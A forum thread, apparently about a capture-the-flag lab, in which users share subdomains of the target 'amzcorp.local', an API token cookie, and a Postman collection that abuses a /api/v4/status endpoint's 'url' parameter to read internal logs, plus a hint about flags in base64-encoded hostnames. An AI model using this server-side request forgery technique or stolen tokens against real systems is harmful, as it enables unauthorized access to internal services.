Posts: 40 Threads: 0 Joined: N/A (July 15, 2022, 02:36 AM)mceye Wrote: (July 15, 2022, 01:34 AM)ryzen Wrote: (July 15, 2022, 01:30 AM)mceye Wrote: query the logs domain
{
"site": "http://logs.amzcorp.local/",
"url": "http://logs.amzcorp.local",
"scheme": ""
}
Where did you find that subdomain? I found jobs, cloud, workflow, company-support and inventory so far.
function GetLogData() {
var log_table = document.getElementById('log_table');
const xhr = new XMLHttpRequest();
xhr.open('GET', '/api/v4/logs/get');
xhr.responseType = 'json';
xhr.onload = function (e) {
if (this.status == 200) {
log_table.append(this.response['log']);
} else {
log_table.append("Error retrieving logs from logs.amzcorp.local");
}
};
xhr.send();
} Ah damn. Can't believe I missed that Posts: 23 Threads: 0 Joined: N/A (July 15, 2022, 02:48 AM)rootntoot Wrote: (July 15, 2022, 02:36 AM)mceye Wrote: (July 15, 2022, 01:34 AM)ryzen Wrote: (July 15, 2022, 01:30 AM)mceye Wrote: query the logs domain
{
"site": "http://logs.amzcorp.local/",
"url": "http://logs.amzcorp.local",
"scheme": ""
}
Where did you find that subdomain? I found jobs, cloud, workflow, company-support and inventory so far.
function GetLogData() {
var log_table = document.getElementById('log_table');
const xhr = new XMLHttpRequest();
xhr.open('GET', '/api/v4/logs/get');
xhr.responseType = 'json';
xhr.onload = function (e) {
if (this.status == 200) {
log_table.append(this.response['log']);
} else {
log_table.append("Error retrieving logs from logs.amzcorp.local");
}
};
xhr.send();
}
ive been getting unauthorized access everytime ive tried since last night, any idea what im doing wrong? Cookie:api_token=98d7f87065c5242ef5d3f6973720293ec58e434281e8195bef26354a6f0e931a1fd50a72ebfc8ead820cb38daca218d771d381259fd5d1a050b6620d1066022a Posts: 6 Threads: 0 Joined: N/A (July 15, 2022, 03:04 AM)mceye Wrote: (July 15, 2022, 02:48 AM)rootntoot Wrote: (July 15, 2022, 02:36 AM)mceye Wrote: (July 15, 2022, 01:34 AM)ryzen Wrote: (July 15, 2022, 01:30 AM)mceye Wrote: query the logs domain
{
"site": "http://logs.amzcorp.local/",
"url": "http://logs.amzcorp.local",
"scheme": ""
}
Where did you find that subdomain? I found jobs, cloud, workflow, company-support and inventory so far.
function GetLogData() {
var log_table = document.getElementById('log_table');
const xhr = new XMLHttpRequest();
xhr.open('GET', '/api/v4/logs/get');
xhr.responseType = 'json';
xhr.onload = function (e) {
if (this.status == 200) {
log_table.append(this.response['log']);
} else {
log_table.append("Error retrieving logs from logs.amzcorp.local");
}
};
xhr.send();
}
ive been getting unauthorized access everytime ive tried since last night, any idea what im doing wrong?
Cookie:api_token=98d7f87065c5242ef5d3f6973720293ec58e434281e8195bef26354a6f0e931a1fd50a72ebfc8ead820cb38daca218d771d381259fd5d1a050b6620d1066022a yeah ive got that in, im trying it at /api/v4/logs/get, anytime i tried going to logs.amzcorp.local i got redirected to jobs.amzcorp.local Posts: 23 Threads: 0 Joined: N/A (July 15, 2022, 03:07 AM)rootntoot Wrote: (July 15, 2022, 03:04 AM)mceye Wrote: (July 15, 2022, 02:48 AM)rootntoot Wrote: (July 15, 2022, 02:36 AM)mceye Wrote: (July 15, 2022, 01:34 AM)ryzen Wrote: Where did you find that subdomain? I found jobs, cloud, workflow, company-support and inventory so far.
function GetLogData() {
var log_table = document.getElementById('log_table');
const xhr = new XMLHttpRequest();
xhr.open('GET', '/api/v4/logs/get');
xhr.responseType = 'json';
xhr.onload = function (e) {
if (this.status == 200) {
log_table.append(this.response['log']);
} else {
log_table.append("Error retrieving logs from logs.amzcorp.local");
}
};
xhr.send();
}
ive been getting unauthorized access everytime ive tried since last night, any idea what im doing wrong?
Cookie:api_token=98d7f87065c5242ef5d3f6973720293ec58e434281e8195bef26354a6f0e931a1fd50a72ebfc8ead820cb38daca218d771d381259fd5d1a050b6620d1066022a
yeah ive got that in, im trying it at /api/v4/logs/get, anytime i tried going to logs.amzcorp.local i got redirected to jobs.amzcorp.local i use postman https://genesis-z.github.io/postman-in-kali/ sometimes curl can get complicated with so many paramaters this will make your life easier. Posts: 6 Threads: 0 Joined: N/A (July 15, 2022, 03:18 AM)mceye Wrote: (July 15, 2022, 03:07 AM)rootntoot Wrote: (July 15, 2022, 03:04 AM)mceye Wrote: (July 15, 2022, 02:48 AM)rootntoot Wrote: ive been getting unauthorized access everytime ive tried since last night, any idea what im doing wrong?
Cookie:api_token=98d7f87065c5242ef5d3f6973720293ec58e434281e8195bef26354a6f0e931a1fd50a72ebfc8ead820cb38daca218d771d381259fd5d1a050b6620d1066022a
yeah ive got that in, im trying it at /api/v4/logs/get, anytime i tried going to logs.amzcorp.local i got redirected to jobs.amzcorp.local
i use postman https://genesis-z.github.io/postman-in-kali/
sometimes curl can get complicated with so many paramaters this will make your life easier. coolio ill take a peak Posts: 40 Threads: 0 Joined: N/A (July 15, 2022, 03:07 AM)rootntoot Wrote: (July 15, 2022, 03:04 AM)mceye Wrote: (July 15, 2022, 02:48 AM)rootntoot Wrote: (July 15, 2022, 02:36 AM)mceye Wrote: (July 15, 2022, 01:34 AM)ryzen Wrote: Where did you find that subdomain? I found jobs, cloud, workflow, company-support and inventory so far.
function GetLogData() {
var log_table = document.getElementById('log_table');
const xhr = new XMLHttpRequest();
xhr.open('GET', '/api/v4/logs/get');
xhr.responseType = 'json';
xhr.onload = function (e) {
if (this.status == 200) {
log_table.append(this.response['log']);
} else {
log_table.append("Error retrieving logs from logs.amzcorp.local");
}
};
xhr.send();
}
ive been getting unauthorized access everytime ive tried since last night, any idea what im doing wrong?
Cookie:api_token=98d7f87065c5242ef5d3f6973720293ec58e434281e8195bef26354a6f0e931a1fd50a72ebfc8ead820cb38daca218d771d381259fd5d1a050b6620d1066022a
yeah ive got that in, im trying it at /api/v4/logs/get, anytime i tried going to logs.amzcorp.local i got redirected to jobs.amzcorp.local I got some logs using the logs.amzcorp.local endpoint as the url param while making a post request to /api/v4/status. Haven’t made any sense of the logs yet. Posts: 6 Threads: 0 Joined: N/A (July 15, 2022, 04:05 AM)ryzen Wrote: (July 15, 2022, 03:07 AM)rootntoot Wrote: (July 15, 2022, 03:04 AM)mceye Wrote: (July 15, 2022, 02:48 AM)rootntoot Wrote: ive been getting unauthorized access everytime ive tried since last night, any idea what im doing wrong?
Cookie:api_token=98d7f87065c5242ef5d3f6973720293ec58e434281e8195bef26354a6f0e931a1fd50a72ebfc8ead820cb38daca218d771d381259fd5d1a050b6620d1066022a
yeah ive got that in, im trying it at /api/v4/logs/get, anytime i tried going to logs.amzcorp.local i got redirected to jobs.amzcorp.local
I got some logs using the logs.amzcorp.local endpoint as the url param while making a post request to /api/v4/status.
Haven’t made any sense of the logs yet. u set it up like that in postman? edit: nvrm i got it, if anyones wondering send a post req to jobs.amzcorp.local/api/v4/status with the body as: { "site": "http://logs.amzcorp.local/", "url": "http://logs.amzcorp.local", "scheme": "" } n make sure you have the api token in ur cookies Posts: 40 Threads: 0 Joined: N/A (July 15, 2022, 04:12 AM)rootntoot Wrote: (July 15, 2022, 04:05 AM)ryzen Wrote: (July 15, 2022, 03:07 AM)rootntoot Wrote: (July 15, 2022, 03:04 AM)mceye Wrote: (July 15, 2022, 02:48 AM)rootntoot Wrote: ive been getting unauthorized access everytime ive tried since last night, any idea what im doing wrong?
Cookie:api_token=98d7f87065c5242ef5d3f6973720293ec58e434281e8195bef26354a6f0e931a1fd50a72ebfc8ead820cb38daca218d771d381259fd5d1a050b6620d1066022a
yeah ive got that in, im trying it at /api/v4/logs/get, anytime i tried going to logs.amzcorp.local i got redirected to jobs.amzcorp.local
I got some logs using the logs.amzcorp.local endpoint as the url param while making a post request to /api/v4/status.
Haven’t made any sense of the logs yet.
u set it up like that in postman? Yup. Here's the postman collection json if anyone needs help setting up. Remember to replace your cookie {
"info": {
"_postman_id": "5bf6b078-b1e0-4b81-843a-f8308e32c73b",
"name": "AWS",
"schema": "https://schema.getpostman.com/json/collection/v2.1.0/collection.json"
},
"item": [
{
"name": "http://jobs.amzcorp.local/api/v4/status",
"request": {
"method": "POST",
"header": [
{
"key": "Content-Type",
"value": "application/json",
"type": "default"
}
],
"body": {
"mode": "raw",
"raw": "{
\"url\": \"http://logs.amzcorp.local\"
}"
},
"url": {
"raw": "http://jobs.amzcorp.local/api/v4/status",
"protocol": "http",
"host": [
"jobs",
"amzcorp",
"local"
],
"path": [
"api",
"v4",
"status"
],
"query": [
{
"key": "url",
"value": "http://logs.amzcorp.local",
"disabled": true
}
]
}
},
"response": []
}
]
}
Posts: 6 Threads: 0 Joined: N/A (July 15, 2022, 04:05 AM)ryzen Wrote: (July 15, 2022, 03:07 AM)rootntoot Wrote: (July 15, 2022, 03:04 AM)mceye Wrote: (July 15, 2022, 02:48 AM)rootntoot Wrote: ive been getting unauthorized access everytime ive tried since last night, any idea what im doing wrong?
Cookie:api_token=98d7f87065c5242ef5d3f6973720293ec58e434281e8195bef26354a6f0e931a1fd50a72ebfc8ead820cb38daca218d771d381259fd5d1a050b6620d1066022a
yeah ive got that in, im trying it at /api/v4/logs/get, anytime i tried going to logs.amzcorp.local i got redirected to jobs.amzcorp.local
I got some logs using the logs.amzcorp.local endpoint as the url param while making a post request to /api/v4/status.
Haven’t made any sense of the logs yet. it just seems to be the http logs from the websites, only really useful thing i could find is company-support.amzcorp.local/users/tickets/create it doesnt give access denied but i also havent been able to figure out what to send yet Posts: 132 Threads: 0 Joined: N/A (July 15, 2022, 05:03 AM)rootntoot Wrote: (July 15, 2022, 04:05 AM)ryzen Wrote: (July 15, 2022, 03:07 AM)rootntoot Wrote: (July 15, 2022, 03:04 AM)mceye Wrote: (July 15, 2022, 02:48 AM)rootntoot Wrote: ive been getting unauthorized access everytime ive tried since last night, any idea what im doing wrong?
Cookie:api_token=98d7f87065c5242ef5d3f6973720293ec58e434281e8195bef26354a6f0e931a1fd50a72ebfc8ead820cb38daca218d771d381259fd5d1a050b6620d1066022a
yeah ive got that in, im trying it at /api/v4/logs/get, anytime i tried going to logs.amzcorp.local i got redirected to jobs.amzcorp.local
I got some logs using the logs.amzcorp.local endpoint as the url param while making a post request to /api/v4/status.
Haven’t made any sense of the logs yet.
it just seems to be the http logs from the websites, only really useful thing i could find is company-support.amzcorp.local/users/tickets/create it doesnt give access denied but i also havent been able to figure out what to send yet To get second flag you have to decode the begining of the BASE64.c00.xyz hostnames you'll get the flag and a lot of shell output |
